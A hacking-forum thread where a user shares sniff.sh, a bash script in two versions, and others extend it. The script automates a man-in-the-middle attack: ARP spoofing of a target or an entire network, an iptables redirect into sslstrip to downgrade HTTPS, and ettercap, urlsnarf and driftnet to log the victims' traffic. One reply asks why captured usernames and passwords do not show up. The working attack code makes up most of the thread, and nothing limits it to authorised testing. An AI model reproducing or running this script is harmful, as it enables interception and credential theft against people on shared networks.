
Thread: Tool I wrote sniff.sh

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Tool I wrote sniff.sh

    Hello,

    I wrote a small script that uses sslstrip, arpspoof and ettercap for sniffing https ...
    I got tired of typing these 3 commands all the time.


    Here is the script:

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script uses Arpspoof, SSLStrip and Ettercap.
    # Tested on BT4 R2
    # BY gHero
    # Ver 0.1
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address:"; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address:"; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>:"; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

    Version 0.2
    # CodeName = cseven

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT4 R2
    # BY gHero,cseven,spudgunman.
    # Ver 0.2
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
    
    # DRIFTNET
    driftnet -p -i $INT &

    Thanks Cseven and Spudgunman..

    And here is a video of the script:
    sniff.sh on Vimeo

  2. #2
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: sniff.sh

    Sometimes the simplest scripts are the best; anyone just learning can easily see what the commands are without having to dissect a more involved script.

    Here's a simple addition for URLSNARF

    Code:
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

  3. #3
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Default Re: sniff.sh

    Awesome, Ghero, excellent work. I will test it out at home fully.

    I'm curious as to why you are using xterm, though? Sorry for my noobness, I'm trying my hand at some scripting and it's not simple at all :P

  4. #4
    Junior Member
    Join Date
    Mar 2010
    Posts
    43

    Default Re: sniff.sh

    VulcanX, this could be of use to you; I found it when doing a little scripting myself.

    bash commands - Linux MAN Pages

  5. #5
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267

    Default Re: sniff.sh

    Nice one. I'm still kind of a noob with bash scripting but this was pretty easy to follow.
    Student Systems Administration and Network Engineering, second year.
    Don't PM me with questions, unless very specific. Otherwise, use the forums so everyone can potentially benefit from it.

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: sniff.sh

    Moved to experts section, and changed title.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Junior Member
    Join Date
    Aug 2010
    Posts
    64

    Default Re: Tool I wrote sniff.sh

    Did you see my tool? http://www.backtrack-linux.org/forum...4x0r-tool.html It has this incorporated into it, basically. You can always add to it; if you do, let me know so I can get it added, and I'll add your name into it as well.

  8. #8
    Junior Member
    Join Date
    Jan 2010
    Posts
    55

    Default Re: Tool I wrote sniff.sh

    ascii art FTW. Now code it in python or perl

  9. #9
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Default Re: Tool I wrote sniff.sh

    From previous MITM attacks I have done, the username/password appeared on the screen. Here I cannot trace it?
    I even tried to check the ssl_log.txt and that's only the SSL certificate info. Am I missing something?

  10. #10
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: Tool I wrote sniff.sh

    Added option to ARP a Target or Network:

    Replace the # Arpspoof section with:

    Code:
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi
